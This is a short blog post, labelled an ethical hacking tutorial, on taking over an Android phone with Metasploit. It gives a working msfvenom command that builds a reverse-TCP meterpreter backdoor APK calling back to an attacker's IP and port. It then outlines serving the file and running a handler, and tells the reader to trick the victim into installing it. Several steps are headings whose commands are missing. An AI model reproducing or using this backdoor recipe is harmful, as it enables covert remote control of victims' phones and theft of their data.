Mobile Hacking using Metasploit Framework. - Only CyberSecurity

Ethical Hacking Tutorial, Cybersecurity

Breaking

Sunday, October 28, 2018

Mobile Hacking using Metasploit Framework.

In this tutorial we are going to learn how to hack an android mobile using metasploit framework with meterpreter commands to extract information.

Create Android malware using msfvenom. Execute the following command to create a malware that can run on Android OS and act as a backdoor.

msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker PORT> R > filename.apk


>To enable targets to download this malware, start apache server by executing below command


>>Load Metasploit Framework to start malware listener.
                                                      service postgresql start


>> msfconsole




>> use multi/handler exploit to handle reverse connections.


>>Make sure to use the same payload that was used during malware creation and configure payload options.


>>Execute exploit command, which starts handler.


Trick the target to download and execute a malicious file.

If the victim downloads and installs the malicious application , then the attacker can gain a meterpreter session.


>>Android meterpreter contains different commands than windows and Linux. We can enter “?” if you like to see the options.


>>Checking Root



>> to access Files and Directories





List of android meterpreter commands will be listed in the next post.
Happy Hacking:)

No comments:

Post a Comment